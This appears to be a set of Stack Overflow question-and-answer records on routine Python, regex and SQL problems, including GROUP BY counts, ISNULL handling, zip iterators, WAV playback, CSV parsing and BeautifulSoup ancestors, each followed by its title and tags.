I looked into the lookahead and lookbehind options, but I get confused.
I am still very new to this, especially in Python so I am open to suggestions on better implementation.
Thanks! | You could use one regular expression for a single 8 digit group and then find all the matches in a line.
```
import re

line = '00A3  388A63FF 00000DF1 52984731 FF989ACB'  # sample line from the question
regex = re.compile(r' (\w{8})')
groups = regex.findall(line)  # a list of the matches in order of appearance
``` | You can indeed use [lookarounds](http://www.regular-expressions.info/lookaround.html):
```
(?<=\d{4}\s{2})(\d{8}\s){4}(?=[\s|])
``` | Python Regular expressions for alpha numeric digits | [
"",
"python",
"regex",
""
] |
I have two tables,
one logs.emails:
```
EmailNum EmployeeID, Emailcontent, EmailReceivers ,is_read
1 1 , "sasa" , "sas@google.com" ,1
2 1 , "sasa" , "sas@google.com" ,0
3 2 , "sasa" , "sas@google.com" ,0
4 2 , "sasa" , "sas@google.com" ,0
5 2 , "sasa" , "sas@google.com" ,0
```
and Employees.user
```
id, FirstName, LastNAme
1 , "John" , "Brown"
2 , "Jack" , "James"
```
My desired Output:
> FirstName, LastName, NumOfUnreadEmails
> John, Brown, 1
> Jack, James, 3
My attempt (but it does not return the first row of the desired output, which is "John, Brown, 1"):
```
SELECT
*, count(EmployeeID) as NumEmails
FROM
logs.emails a
inner join
Employees.user b on a.EmployeeID=b.id
group by
EmployeeID
having
a.is_read='0'
```
Your help is appreciated | You should specify a `WHERE` clause here instead of using `HAVING`, as you are trying to filter out the records that have `is_read=0` prior to doing any aggregation.
Also, in order to get only the fields desired, don't use `*` . Simply specify the fields you want.
```
SELECT
b.FirstName, b.LastName, COUNT(a.EmailNum)
FROM
logs.emails a
inner join
Employees.user b on a.EmployeeID=b.id
where
a.is_read='0'
group by
b.id
``` | Try this way:
```
SELECT b.FirstName, b.LastName,
sum( case
               when a.is_read=0 then 1
else 0
end ) as NumOfUnreadEmails
FROM logs.emails a
inner join Employees.user b on a.EmployeeID=b.id
group by b.FirstName, b.LastName
``` | MySQL Query (Group by) | [
"",
"mysql",
"sql",
""
] |
I want to write a loopless program (probably using comprehension) to remove duplicate elements in a sorted array in Python (and most efficiently too). | Since the list is sorted - meaning all the duplicates are already grouped, you can use `itertools.groupby`
```
>>> testList = [1, 1, 1, 2, 3, 3, 4, 4, 5, 6, 7, 8, 8, 9]
>>> from itertools import groupby
>>> [k for k, g in groupby(testList)]
[1, 2, 3, 4, 5, 6, 7, 8, 9]
```
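For instance, because only `==` is required, adjacent duplicates of unhashable items also collapse, where `set()` would raise a `TypeError`:

```python
from itertools import groupby

# Lists are unhashable, so set(pairs) would fail; groupby still works
# because it only compares neighbouring items for equality.
pairs = [[1, 2], [1, 2], [3, 4], [3, 4], [3, 4]]
deduped = [k for k, g in groupby(pairs)]
print(deduped)  # → [[1, 2], [3, 4]]
```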
This is more efficient (in memory and time) that converting to a set and sorting. It also has the advantage of only needing to compare for equality, so works ok for unhashable items too. | I would personally just use this.
```
>>> testList = [1, 1, 1, 2, 3, 3, 4, 4, 5, 6, 7, 8, 8, 9]
>>> sorted(set(testList))
[1, 2, 3, 4, 5, 6, 7, 8, 9]
```
You can even sort a list from the beginning.
```
>>> from random import shuffle
>>> shuffle(testList)
>>> testList
[1, 4, 5, 6, 2, 1, 3, 3, 4, 9, 8, 1, 7, 8]
>>> sorted(set(testList))
[1, 2, 3, 4, 5, 6, 7, 8, 9]
``` | Loopless program to remove duplicate elements in a sorted array | [
"",
"python",
""
] |
I tried PyGame for playing a WAV file like this:
```
import pygame
pygame.init()
pygame.mixer.music.load("mysound.wav")
pygame.mixer.music.play()
pygame.event.wait()
```
but it changes the voice and I don't know why!
I read the solutions at [this link](https://stackoverflow.com/questions/307305/play-a-sound-with-python) but couldn't solve my problem with playing the WAV file!
For this solution, I don't know what I should import:
```
s = Sound()
s.read('sound.wav')
s.play()
```
and for this solution, /dev/dsp doesn't exist in newer versions of Linux:
```
from wave import open as waveOpen
from ossaudiodev import open as ossOpen
s = waveOpen('tada.wav','rb')
(nc,sw,fr,nf,comptype, compname) = s.getparams( )
dsp = ossOpen('/dev/dsp','w')
try:
from ossaudiodev import AFMT_S16_NE
except ImportError:
if byteorder == "little":
AFMT_S16_NE = ossaudiodev.AFMT_S16_LE
else:
AFMT_S16_NE = ossaudiodev.AFMT_S16_BE
dsp.setparameters(AFMT_S16_NE, nc, fr)
data = s.readframes(nf)
s.close()
dsp.write(data)
dsp.close()
```
and when I tried pyglet, it gave me this error:
```
import pyglet
music = pyglet.resource.media('mysound.wav')
music.play()
pyglet.app.run()
--------------------------
nima@ca005 Desktop]$ python play.py
Traceback (most recent call last):
File "play.py", line 4, in <module>
music = pyglet.resource.media('mysound.wav')
File "/usr/lib/python2.7/site-packages/pyglet/resource.py", line 587, in media
return media.load(path, streaming=streaming)
File "/usr/lib/python2.7/site-packages/pyglet/media/__init__.py", line 1386, in load
source = _source_class(filename, file)
File "/usr/lib/python2.7/site-packages/pyglet/media/riff.py", line 194, in __init__
format = wave_form.get_format_chunk()
File "/usr/lib/python2.7/site-packages/pyglet/media/riff.py", line 174, in get_format_chunk
for chunk in self.get_chunks():
File "/usr/lib/python2.7/site-packages/pyglet/media/riff.py", line 110, in get_chunks
chunk = cls(self.file, name, length, offset)
File "/usr/lib/python2.7/site-packages/pyglet/media/riff.py", line 155, in __init__
raise RIFFFormatException('Size of format chunk is incorrect.')
pyglet.media.riff.RIFFFormatException: Size of format chunk is incorrect.
AL lib: ReleaseALC: 1 device not closed
``` | You can use [PyAudio](https://people.csail.mit.edu/hubert/pyaudio/docs/#class-pyaudio). An example here on my Linux it works:
```
#!usr/bin/env python
#coding=utf-8
import pyaudio
import wave
#define stream chunk
chunk = 1024
#open a wav format music
f = wave.open(r"/usr/share/sounds/alsa/Rear_Center.wav","rb")
#instantiate PyAudio
p = pyaudio.PyAudio()
#open stream
stream = p.open(format = p.get_format_from_width(f.getsampwidth()),
channels = f.getnchannels(),
rate = f.getframerate(),
output = True)
#read data
data = f.readframes(chunk)
#play stream
while data:
stream.write(data)
data = f.readframes(chunk)
#stop stream
stream.stop_stream()
stream.close()
#close PyAudio
p.terminate()
``` | Works for me on Windows:
<https://pypi.org/project/playsound/>
```
>>> from playsound import playsound
>>> playsound('/path/to/a/sound/file/you/want/to/play.wav')
```
NOTE: This has a bug in Windows where it doesn't close the stream.
I've added a PR for a fix here:
<https://github.com/TaylorSMarks/playsound/pull/53/commits/53240d970aef483b38fc6d364a0ae0ad6f8bf9a0> | Play WAV file in Python | [
"",
"python",
"audio",
"pygame",
"pyglet",
""
] |
Python 3.2
```
t = (1, 2, 3)
t2 = (5, 6, 7)
z = zip(t, t2)
for x in z:
print(x)
```
Result:
```
(1, 5)
(2, 6)
(3, 7)
```
Putting in EXACTLY the same loop immediately after, nothing is printed:
```
for x in z:
print(x)
```
`z` still exists as `<zip object at 0xa8d48ec>`. I can even reassign the `t`, `t2` to be zipped again, but then it only works once and only once, again.
Is this how it's supposed to work? There's no mention in [the docs](https://docs.python.org/3.2/library/functions.html#zip) about this. | That's how it works in Python 3.x. In Python 2.x, `zip` returned a list of tuples, but in Python 3.x, `zip` behaves like `itertools.izip` did in Python 2.x. To regain the Python 2.x behavior, just construct a list from `zip`'s output:
```
z = list(zip(t,t2))
```
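Once materialised, the result can be iterated any number of times:

```python
t, t2 = (1, 2, 3), (5, 6, 7)

z = list(zip(t, t2))
print(z)  # → [(1, 5), (2, 6), (3, 7)]
print(z)  # → [(1, 5), (2, 6), (3, 7)]  (a list is not exhausted by iteration)
```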
Note that in python3.x, a lot of the builtin functions now return iterators rather than lists (`map`, `zip`, `filter`) | Because `zip` returns an iterator in Python 3.x. If you want to re-use it, then make it a `list` first:
```
z = list(zip(t, t2))
``` | zip variable empty after first use | [
"",
"python",
"python-3.x",
"iterator",
""
] |
I am new to SQL development. So I would like to get some help from SO.
I have three tables: **student**, **student\_addresses**, **student\_phones**.
Their schema is roughly as follows:
```
student
-------
student_id (Primary Key)
student_name
father_name
mother_name
student_addresses
-----------------
student_address_id (Primary Key)
student_id (Foreign Key)
address
zip_code
student_phones
--------------
student_phone_id (Primary Key)
student_id (Foreign Key)
phone_type
phone_number
```
Both **student\_addresses** and **student\_phones** are has\_many relations. So I would like to SELECT all the fields from **student** for a particular **student\_id**, but only the matching counts (totals) from **student\_addresses** and **student\_phones** for that **student\_id**. How do I get that?
I have tried this query, but it returns an error:
```
SELECT students.student_id,student_name,father_name,mother_name,
COUNT(student_addresses.student_id) AS total_addresses,
COUNT(student_phones.student_id) AS total_phones
FROM students,student_phones,student_addresses
WHERE students.student_id = student_phones.student_id AND
students.student_id = student_addresses.student_id AND
students.student_id = 7;
```
PS: Currently I am using PostgreSQL. However, I would like it to work on MySQL also. So does that mean I need two different queries? AFAIK, a single query should work on both, since MySQL and PostgreSQL follow the same SQL implementation as far as this query is concerned.
I am wondering if I can do it without using GROUP BY, because if the student table had more fields, say 12, I would have to put all of the field names both in SELECT and in GROUP BY (AFAIK), which seems a bit inelegant. | This should work on MySQL and PostgreSQL:
```
SELECT s.student_id,
max(s.student_name) student_name,
max(s.father_name) father_name,
max(s.mother_name) mother_name,
COUNT(distinct a.student_address_id) total_addresses,
COUNT(distinct p.student_phone_id) total_phones
FROM students s
LEFT JOIN student_phones p ON s.student_id = p.student_id
LEFT JOIN student_addresses a ON s.student_id = a.student_id
WHERE s.student_id = 7
GROUP BY s.student_id
``` | Just add `GROUP BY`:
```
SELECT students.student_id,student_name,father_name,mother_name,
COUNT(student_addresses.student_id) AS total_addresses,
COUNT(student_phones.student_id) AS total_phones
FROM students,student_phones,student_addresses
WHERE students.student_id = student_phones.student_id AND
students.student_id = student_addresses.student_id AND
students.student_id = 7
GROUP BY students.student_id,student_name,father_name,mother_name;
```
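One caveat that applies to plain `COUNT` here: when a student has several phones *and* several addresses, the two joins multiply rows, so both counts come back inflated (which is why the accepted query counts DISTINCT ids). A quick sqlite3 sketch with made-up data shows the inflation:

```python
import sqlite3

# Throwaway in-memory tables (hypothetical data): one student,
# 2 phones and 3 addresses.
con = sqlite3.connect(":memory:")
con.executescript("""
    CREATE TABLE students (student_id INTEGER, student_name TEXT);
    CREATE TABLE student_phones (student_phone_id INTEGER, student_id INTEGER);
    CREATE TABLE student_addresses (student_address_id INTEGER, student_id INTEGER);
    INSERT INTO students VALUES (7, 'John');
    INSERT INTO student_phones VALUES (1, 7), (2, 7);
    INSERT INTO student_addresses VALUES (1, 7), (2, 7), (3, 7);
""")

plain = con.execute("""
    SELECT COUNT(a.student_address_id), COUNT(p.student_phone_id)
    FROM students s
    JOIN student_phones p ON s.student_id = p.student_id
    JOIN student_addresses a ON s.student_id = a.student_id
    WHERE s.student_id = 7
""").fetchone()

distinct = con.execute("""
    SELECT COUNT(DISTINCT a.student_address_id), COUNT(DISTINCT p.student_phone_id)
    FROM students s
    JOIN student_phones p ON s.student_id = p.student_id
    JOIN student_addresses a ON s.student_id = a.student_id
    WHERE s.student_id = 7
""").fetchone()

print(plain)     # (6, 6) -- 2 phones x 3 addresses = 6 joined rows
print(distinct)  # (3, 2) -- the real totals
```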
But if it happens that student with id 7 has no address or no phone number, it will return no result. To return something even in this case, try using `LEFT JOIN`s:
```
SELECT students.student_id,student_name,father_name,mother_name,
COUNT(student_addresses.student_id) AS total_addresses,
COUNT(student_phones.student_id) AS total_phones
FROM students
LEFT JOIN student_phones ON students.student_id = student_phones.student_id
LEFT JOIN student_addresses ON students.student_id = student_addresses.student_id
WHERE students.student_id = 7
GROUP BY students.student_id,student_name,father_name,mother_name;
``` | SQL Query to get the data | [
"",
"mysql",
"sql",
"database",
"postgresql",
""
] |
Here is the information in the file:
```
"Part no.","Description","Price"
"453","Sperving_Bearing","9900"
"1342","Panametric_Fan","23400"
"9480","Converter_Exchange","93859"
```
I'm trying to figure out how to open up a file and then store its contents into a dictionary using the Part no. as the key and the other information as the value. So I want it to look something like this:
```
{Part no.: "Description,Price", 453: "Sperving_Bearing,9900", 1342: "Panametric_Fan,23400",9480: "Converter_Exchange,93859"}
```
I was able to store the text from the file into a list, but I'm not sure how to assign more than one value to a key. I'm trying to do this without importing any modules. I've been using the basic str methods, list methods and dict methods.
Here is my code so far (I'm assuming the filename will be entered correctly):
```
textname = input("Enter a file")
thetextfile = open(textname,'r')
print("The file has been successfully opened!")
thetextfile = thetextfile.read()
file_s = thetextfile.split()
holder = []
ck = 0
for c in range(len(file_s)):
holder.append(file_s[c])
ck = ck+1
if(ck == 3):
holder.insert(c,'\n')
count = 0
holder_string = "".join(holder)
holder = holder_string.split("\n")
wordlist = {}
#kind of stuck here.
``` | A CSV is a comma-separated values file, so I'm going to assume that each variable is indeed separated by commas:
```
f = open("myfile.csv", 'r')
data = f.read().split('\n') #separates the contents into lines while leaving out the newline characters
myDict = {}
for x in range(len(data)):
    data[x] = data[x].split(',') #makes each line a list of variables. If the data contains extra white space, use the strip() method
myDict[data[x][0]] = (data[x][1], data[x][2]) #this will make the dictionary like you described in the question
```
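The same idea fed from an inline string (no file needed), using the sample rows from the question; note the naive comma split only works here because none of the fields contain embedded commas, and the quotes have to be stripped by hand:

```python
text = '''"Part no.","Description","Price"
"453","Sperving_Bearing","9900"
"1342","Panametric_Fan","23400"
"9480","Converter_Exchange","93859"'''

myDict = {}
for line in text.split('\n'):
    fields = [f.strip('"') for f in line.split(',')]  # drop the surrounding quotes
    myDict[fields[0]] = (fields[1], fields[2])

print(myDict['453'])       # ('Sperving_Bearing', '9900')
print(myDict['Part no.'])  # ('Description', 'Price')
```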
Don't forget to close your files (unless you're using the `with` statement). | Perhaps like this:
```
wordlist = {}
with open(textname, 'r') as thetextfile:
for line in thetextfile:
line = line.split()
wordlist[line[0]] = line[1:]
```
That makes the dict values the (more convenient) list of remaining items. But, if you really wanted the "," string syntax that you have above, maybe:
```
wordlist = {}
with open(textname, 'r') as thetextfile:
for line in thetextfile:
line = line.split()
wordlist[line[0]] = ",".join(line[1:])
``` | How to extract contents of a csv file and place them in a dict file type without using csv module. [python] | [
"",
"python",
"string",
"list",
"dictionary",
"io",
""
] |
I really like using docstrings in Python to specify type parameters when projects get beyond a certain size.
I'm having trouble finding a standard to use to specify that a parameter is a list of specific objects, e.g. in Haskell types I'd use [String] or [A].
Current standard (recognisable by PyCharm editor):
```
def stringify(listOfObjects):
"""
:type listOfObjects: list
"""
return ", ".join(map(str, listOfObjects))
```
What I'd prefer:
**OPTION 1**
```
def stringify(listOfObjects):
"""
:type listOfObjects: list<Object>
"""
return ", ".join(map(str, listOfObjects))
```
**OPTION 2**
```
def stringify(listOfObjects):
"""
:type listOfObjects: [Object]
"""
return ", ".join(map(str, listOfObjects))
```
I suppose that wasn't a great example - the more relevant use case would be one where the objects in the list must be of a specific type.
**BETTER EXAMPLE**
```
class Food(object):
    def __init__(self, calories):
        self.calories = calories
class Apple(Food):
    def __init__(self):
        super(Apple, self).__init__(200)
class Person(object):
    energy = 0
    def eat(self, foods):
        """
        :type foods: [Food] # is NOT recognised by editor
        """
        for food in foods:
            self.energy += food.calories
```
So, other than the fact that I'm getting hungry, this example illustrates that if called with a list of the wrong kind of object, the code would break. Hence the importance of documenting not only that it needs a list, but that it needs a list of Food.
**RELATED QUESTION**
[How can I tell PyCharm what type a parameter is expected to be?](https://stackoverflow.com/questions/6318814/how-can-i-tell-pycharm-what-type-a-parameter-is-expected-to-be)
Please note that I'm looking for a more specific answer than the one above. | In the comments section of [PyCharm's manual](http://www.jetbrains.com/pycharm/webhelp/type-hinting-in-pycharm.html) there's a nice hint from a developer:
```
#: :type: dict of (str, C)
#: :type: list of str
```
It works for me pretty well. Now it makes me wonder what's the best way to document parametrized classes in Python :). | As pointed out in the [PyCharm docs](https://www.jetbrains.com/help/pycharm/type-syntax-for-docstrings.html), *a* (legacy, pre-[PEP-484](https://www.python.org/dev/peps/pep-0484/)) way of doing this is using square brackets:
> list[Foo]: List of Foo elements
>
> dict[Foo, Bar]: Dict from Foo to Bar
`list of str`, as suggested in [the accepted answer](https://stackoverflow.com/a/19524180/942774), *does not work* as expected in PyCharm.
Starting with Python 3.5 and the implementation of [PEP-484](https://www.python.org/dev/peps/pep-0484/), you can also use type hints, which may be nicely supported by your IDE/editor. How this is easily done in PyCharm is explained [here](https://www.jetbrains.com/help/pycharm/type-hinting-in-product.html).
In essence, to declare a list return type using type-hinting (Python >=3.5), you may do something like this:
```
from typing import List

def foo() -> List[str]:
    """
    Great foo function.
    :rtype: list[str]
    """
    return ['some string', 'some other string']
```
Here we declare (somewhat redundantly) that the function `foo` returns a list of strings, both in the type hint `-> List[str]` and in the docstring `:rtype: list[str]`.
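The same combination works for parameters, which is what the question actually needs; a small hypothetical function (the names here are made up for illustration) carries both the annotation and the legacy docstring form:

```python
from typing import List

def eat(foods: List[str]) -> int:
    """Sum a list of calorie counts given as strings.

    :type foods: list[str]
    :rtype: int
    """
    return sum(int(f) for f in foods)

print(eat(["200", "150"]))           # 350
print(eat.__annotations__["foods"])  # typing.List[str]
```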
Other pre-declared types and more info can be found in the Python docs for [typing](https://docs.python.org/3/library/typing.html). | How to specify that a parameter is a list of specific objects in Python docstrings | [
"",
"python",
"pycharm",
"docstring",
""
] |
Does the BeautifulSoup library for Python have any function that can take a list of nodes and return the lowest common ancestor?
If not, have any of you ever implemented such a function and care to share it? | I think this is what you want, with link1 being one element and link2 being another:
```
link_1_parents = list(link1.parents)[::-1]
link_2_parents = list(link2.parents)[::-1]
common_parent = [x for x,y in zip(link_1_parents, link_2_parents) if x is y][-1]
print common_parent
print common_parent.name
```
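As a quick self-contained check of this approach (no bs4 needed), a tiny stand-in node class with a `.parents` chain like BeautifulSoup's behaves the same way:

```python
# Minimal stand-in for bs4 tags: each node knows its parent and
# exposes a .parents generator, like BeautifulSoup's tags do.
class Node:
    def __init__(self, name, parent=None):
        self.name, self.parent = name, parent

    @property
    def parents(self):
        n = self.parent
        while n is not None:
            yield n
            n = n.parent

root = Node("html")
body = Node("body", root)
div = Node("div", body)
link1 = Node("a", div)
link2 = Node("a", body)

l1 = list(link1.parents)[::-1]  # root ... immediate parent
l2 = list(link2.parents)[::-1]
common = [x for x, y in zip(l1, l2) if x is y][-1]
print(common.name)  # body
```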
It'll basically walk both elements' parents from root down, and return the last common one. | The accepted answer does not work if the distance from a tag in the input list to the lowest common ancestor is not exactly the same for every node in the input.
It also uses every ancestor of each node, which is unnecessary and could be very expensive in some cases.
```
import collections
def lowest_common_ancestor(parents=None, *args):
if parents is None:
parents = collections.defaultdict(int)
for tag in args:
if not tag:
continue
parents[tag] += 1
if parents[tag] == len(args):
return tag
return lowest_common_ancestor(parents, *[tag.parent if tag else None for tag in args])
``` | BeautifulSoup lowest common ancestor | [
"",
"python",
"algorithm",
"graph",
"beautifulsoup",
""
] |
I've been trying to generate a working regex that finds attributes of html tags for
a while now, but they all seem to fail one way or another.
I'm using a regex because loading BeautifulSoup takes too long just to check one html tag.
Here is an example of the tag/property which needs to be checked:
```
<meta content="http://domain.com/path/path/file.jpg" rnd_attr="blah blah"
property="og:image"/>
```
How could a regex retrieve the content of this tag while making sure that the tag's property is "og:image"?
Sorry if this question is a bit naive or if it's totally infeasible to generate such a regex.
BONUS: Aside from BeautifulSoup, what other fast / working alternatives for DOM parserish things are there in python?
Thanks. | # Description
This expression will
* find the meta tag which has an attribute `property="og:image"`
* avoid some really difficult edge cases
* capture the value of the content attribute
* allow the attributes to appear in any order
`<meta(?=\s|>)(?=(?:[^>=]|='[^']*'|="[^"]*"|=[^'"][^\s>]*)*?\sproperty=(?:'og:image|"og:image"|og:image))(?=(?:[^>=]|='[^']*'|="[^"]*"|=[^'"][^\s>]*)*?\scontent=('[^']*'|"[^"]*"|[^'"][^\s>]*))(?:[^'">=]*|='[^']*'|="[^"]*"|=[^'"][^\s>]*)*>`

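For comparison, here is my own much smaller sketch runnable from Python's `re` module; it is deliberately simple and therefore fragile (unlike the robust expression above, it assumes double-quoted attribute values with no `>` or `"` inside them):

```python
import re

def og_image(html):
    # Try property-then-content order first, then the reverse.
    patterns = (r'<meta\b[^>]*property="og:image"[^>]*content="([^"]*)"',
                r'<meta\b[^>]*content="([^"]*)"[^>]*property="og:image"')
    for pat in patterns:
        m = re.search(pat, html)
        if m:
            return m.group(1)
    return None

tag = ('<meta content="http://domain.com/path/path/file.jpg" '
       'rnd_attr="blah blah" property="og:image"/>')
print(og_image(tag))  # http://domain.com/path/path/file.jpg
```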
# Example
In this live example, note the difficult edge case in the first of the sample meta tags: <http://www.rubular.com/r/YY70uaGPLE>
**Sample Text**
```
<meta info=' content="DontFindMe" ' content="http://domain.com/path/path/file1.jpg" random_attr="blah blah"
property="og:image"/>
<meta content="http://domain.com/path/path/file2.jpg" random_attr="blah blah"
property="og:image"/>
<meta random_attr="blah blah" property='og:image' content="foo'" />
```
**Matches**
```
[0][0] = <meta info=' content="DontFindMe" ' content="http://domain.com/path/path/file1.jpg" random_attr="blah blah"
property="og:image"/>
[0][1] = "http://domain.com/path/path/file1.jpg"
[1][0] = <meta content="http://domain.com/path/path/file2.jpg" random_attr="blah blah"
property="og:image"/>
[1][1] = "http://domain.com/path/path/file2.jpg"
[2][0] = <meta random_attr="blah blah" property='og:image' content="foo'" />
[2][1] = "foo'"
``` | Have you actually benchmarked it and found that BeautifulSoup was the bottleneck?
```
content = soup.find('meta', property='og:image').get('content')
```
You could also use [lxml](http://lxml.de/), which is much faster:
```
import lxml.html
root = lxml.html.fromstring(html) # Use .parse() on a file-like object instead
content = root.xpath('/html/head/meta[@property="og:image"][1]/@content')
``` | Regex in python that finds the attribute of some HTML tag? | [
"",
"python",
"regex",
"beautifulsoup",
""
] |
Today I encountered an odd issue with the ISNULL function in SQL.
I have a table containing customer information, and I have to display a full name by concatenating First Name, Middle Initial and Last Name. I know the Middle Initial column in the table is nullable.
So I used the ISNULL function to return the Middle Initial if it is not null, which works fine. But I also used ISNULL with an expression, as below, which I assumed should not work when MI is null, yet interestingly it worked.
```
SELECT FirstName + ' ' + LastName + ' '+ ISNULL(MI + '.', '') As MiddleInitial
FROM CS_tblMaster WHERE CustomerNo = 2627240
```
The above SQL query should return MiddleInitial as "." when the middle initial is null, but it returned an empty string instead.
So I wrote another query as below.
```
SELECT (MI + '.') AS MiddleInitial FROM CS_tblMaster WHERE CustomerNo = 2627240
```
which again returned NULL.
Somehow, when you concatenate a string with a NULL value, the result is NULL. I would like to understand this behavior.
Can someone help? | – Original statement
```
SELECT FirstName + ' ' + LastName + ' '+ ISNULL(MI + '.', '') As MiddleInitial
FROM CS_tblMaster WHERE CustomerNo = 2627240
```
– My original answer (edited)
```
SELECT FirstName + ' ' + LastName + ' '+ (ISNULL(MI, '') + '.') As MiddleInitial
FROM CS_tblMaster WHERE CustomerNo = 2627240
```
In this case, SQL would first check to see if MI is Null and uses MI if Not Null or uses an empty string if it is. *Then* it concatenates that result, which is now never Null, with the period.
– Final answer
```
SELECT
FirstName + ' ' + LastName + ' '
+ CASE WHEN MI IS NULL THEN '' ELSE MI + '.' END As MiddleInitial
FROM CS_tblMaster WHERE CustomerNo = 2627240
```
@Satish, not sure if you feel you have answer yet since you haven't selected one, and I apologize if my answer was short and fast. Seeing all the responses made me realize I hadn't thought much about your question when I first saw it.
To answer “I would like to understand of this implementation”, Nulls are a completely special value in SQL. Not an empty string, not spaces, not zeros. They mean in a more literal sense “nothing”. You can check for them, can see if something *is* null. But you can't “do” things with Nulls. So 57 + Null = Null. 'Mary' + Null = Null. ((12 \*37) +568) / Null = Null. The Max() of 'Albert', 'Mary', Null, and 'Zeke' is Null. This article <http://en.wikipedia.org/wiki/Null_(SQL)> may help, with a decent description in the section on Null Propagation.
The ISNULL function is not so much a test for Null, but a way to handle it. So to *test* if something is Null you would use ColumnName Is Null or ColumnName Is Not Null in your Select. What Isnull(MI,'') says is: I want a value; if the value of MI is not null, then I want MI, otherwise I want an empty string.
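The propagation rule is easy to poke at from Python with sqlite3 (SQLite spells concatenation `||` and the fallback function `IFNULL`, but the NULL semantics match SQL Server's):

```python
import sqlite3

con = sqlite3.connect(":memory:")

# String concatenation with NULL yields NULL...
concat_null = con.execute("SELECT 'Mary' || NULL").fetchone()[0]
# ...and IFNULL supplies a fallback value, like ISNULL does:
guarded = con.execute("SELECT 'Mary ' || IFNULL(NULL, '')").fetchone()[0]
# The question's pattern: period only when an initial exists.
with_mi = con.execute("SELECT IFNULL('Q' || '.', '')").fetchone()[0]
without_mi = con.execute("SELECT IFNULL(NULL || '.', '')").fetchone()[0]

print(concat_null)  # None -- NULL propagates through concatenation
print(guarded)      # 'Mary '
print(with_mi)      # 'Q.'
print(without_mi)   # '' (empty string)
```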
Going on, I'm not sure I initially understood what you were actually trying to do. If you were trying to get a period when the middle initial was null, then my original answer and most of the others would work for you. But I think you may be trying to say: If I have a middle initial, then I want the middle initial followed by a period. If I don't have middle initial then I want nothing: 'Alberto C. Santaballa' or 'Alberto Santaballa', never 'Alberto . Santaballa”. If that is the case then use the final statement in the edited answer.
@Zec, thanks for the edit. The typo was another product of too-fast typing! :-/ | If you want to put a period if the MI is null use this: (You just have your `'.'` in the wrong spot)
```
SELECT FirstName + ' ' + LastName + ' '+ ISNULL(MI, '.') As MiddleInitial FROM CS_tblMaster WHERE CustomerNo = 2627240
``` | ISNULL in SQL Server 2008 | [
"",
"sql",
"sql-server-2008",
""
] |
persons.CSV file looks like:
```
Firstname,Surname,Birth Year,Hobby
John,Smith,1990,"tenis,piano"
Andrew,Josh,1988,"surfing,art"
```
I would like the hobby to be represented in the program as a list, not as a string. How can I force DictReader to do that?
The python code I use look as follows:
```
import csv
class Person(object):
extPerson = []
counter = 0
def __init__(self, **args):
for k, v in args.items():
setattr(self, k, v)
Person.counter += 1
Person.extPerson.append(self)
def __str__(self):
s=""
for k,v in self.__dict__.items():
s+=k+": "+v+", "
return s
csvdr = csv.DictReader(open('persons.csv'))
for p in csvdr:
print p
Person(**p)
for p in Person.extPerson:
print p
print p.Hobby
```
The output looks as follows:
```
{'Birth Year': '1990', 'Hobby': 'tenis,piano', 'Surname': 'Smith', 'Firstname': 'John'}
{'Birth Year': '1988', 'Hobby': 'surfing,art', 'Surname': 'Josh', 'Firstname': 'Andrew'}
Birth Year: 1990, Hobby: tenis,piano, Surname: Smith, Firstname: John,
tenis,piano
Birth Year: 1988, Hobby: surfing,art, Surname: Josh, Firstname: Andrew,
surfing,art
```
I would like the hobbies to be packed into a list in the constructor:
```
(...)
Birth Year: 1990, Hobby: ['tenis','piano'], Surname: Smith, Firstname: John,
['tenis', 'piano']
Birth Year: 1988, Hobby: ['surfing','art'], Surname: Josh, Firstname: Andrew,
['surfing', 'art']
``` | As you're reading the rows in, you need to `split()` the hobby field:
```
one_row = {'Birth Year': '1990', 'Hobby': 'tenis,piano', 'Surname': 'Smith', 'Firstname': 'John'}
one_row['Hobby'] = one_row['Hobby'].split(',')
one_row
Out[7]:
{'Birth Year': '1990',
'Firstname': 'John',
'Hobby': ['tenis', 'piano'],
'Surname': 'Smith'}
```
In your current code, this would go here:
```
for p in csvdr:
p['Hobby'] = p['Hobby'].split(',')
print p
Person(**p)
```
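Putting it together on the sample data (Python 3 syntax here, and reading from an in-memory string instead of a file):

```python
import csv
import io

data = io.StringIO(
    'Firstname,Surname,Birth Year,Hobby\n'
    'John,Smith,1990,"tenis,piano"\n'
    'Andrew,Josh,1988,"surfing,art"\n'
)

people = []
for row in csv.DictReader(data):
    # The quoted field arrives as one string, e.g. 'tenis,piano'.
    row['Hobby'] = row['Hobby'].split(',')
    people.append(row)

print(people[0]['Hobby'])  # ['tenis', 'piano']
print(people[1]['Hobby'])  # ['surfing', 'art']
```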
Your current `__str__` method won't work with the lists, but you only need a small change to fix that: convert the list values to strings using `str`; the string values are unaffected:
```
def __str__(self):
s=""
for k,v in self.__dict__.items():
s += k + ": " + str(v) + ", "
return s
``` | ```
class MyDictReader(csv.DictReader):
def next(self):
if self.line_num == 0:
# Used only for its side effect.
self.fieldnames
row = self.reader.next()
self.line_num = self.reader.line_num
# unlike the basic reader, we prefer not to return blanks,
# because we will typically wind up with a dict full of None
# values
while row == []:
row = self.reader.next()
row = map(lambda x:x.split(",") if "," in x else x,row)
d = dict(zip(self.fieldnames, row))
lf = len(self.fieldnames)
lr = len(row)
if lf < lr:
d[self.restkey] = row[lf:]
elif lf > lr:
for key in self.fieldnames[lr:]:
d[key] = self.restval
return d
``` | CSV DictReader, how to force a part in "" to be read as list not as string | [
"",
"python",
"oop",
"csv",
""
] |